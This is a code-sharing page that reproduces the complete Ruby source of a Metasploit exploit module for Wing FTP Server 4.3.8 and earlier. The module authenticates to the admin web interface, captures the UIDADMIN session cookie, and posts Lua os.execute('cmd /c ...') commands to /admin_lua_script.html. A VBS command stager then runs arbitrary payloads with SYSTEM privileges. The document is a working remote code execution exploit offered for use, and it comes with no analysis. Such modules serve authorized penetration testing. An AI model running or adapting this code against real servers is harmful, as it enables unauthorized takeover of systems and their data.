扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 |
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::CmdStager include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Wing FTP Server Authenticated Command Execution', 'Description'=> %q{ This module exploits the embedded Lua interpreter in the admin web interface for versions 4.3.8 and below. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges. }, 'Author' => [ 'Nicholas Nam <nick[at]executionflow.org>' ], 'License'=> MSF_LICENSE, 'References' => [ [ 'URL', 'http://www.wftpserver.com' ] ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'Targets'=> [ [ 'Windows VBS Stager', {} ] ], 'Privileged' => true, 'DisclosureDate' => 'Jun 19 2014', 'DefaultTarget'=> 0 )) register_options( [ Opt::RPORT(5466), OptString.new('USERNAME', [true, 'Admin username', '']), OptString.new('PASSWORD', [true, 'Admin password', '']) ], self.class ) deregister_options('CMDSTAGER::FLAVOR') end def check res = send_request_cgi( { 'uri' =>'/admin_login.html', 'method'=> 'GET' }) if !res fail_with(Failure::Unreachable, "#{peer} - Admin login page was unreachable.") elsif res.code != 200 fail_with(Failure::NotFound, "#{peer} - Admin login page was not found.") elsif res.body =~ /Wing FTP Server Administrator/ && res.body =~ /2003-2014 <b>wftpserver.com<\/b>/ return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe end def exploit username = datastore['USERNAME'] password = datastore['PASSWORD'] @session_cookie = authenticate(username, password) print_status("#{peer} - Sending payload") # Execute the cmdstager, max length of the commands is ~1500 execute_cmdstager(flavor: :vbs, linemax: 1500) end def execute_command(cmd, _opts = {}) command = "os.execute('cmd /c #{cmd}')" res = send_request_cgi( 'uri' => '/admin_lua_script.html', 'method'=> 'POST', 'cookie'=> @session_cookie, 'vars_post' => { 'command' => command } ) if res && res.code != 200 fail_with(Failure::Unkown, "#{peer} - Something went wrong.") end end def authenticate(username, password) print_status("#{peer} - Authenticating") res = send_request_cgi( 'uri' => '/admin_loginok.html', 'method'=> 'POST', 'vars_post' => { 'username' => username, 'password' => password, 'username_val' => username, 'password_val' => password, 'submit_btn' => '+Login+' } ) uidadmin = '' if !res fail_with(Failure::Unreachable, "#{peer} - Admin login page was unreachable.") elsif res.code == 200 && res.body =~ /location='main.html\?lang=english';/ res.get_cookies.split(';').each do |cookie| cookie.split(',').each do |value| uidadmin = value.split('=')[1] if value.split('=')[0] =~ /UIDADMIN/ end end else fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end "UIDADMIN=#{uidadmin}" end end |
体验盒子
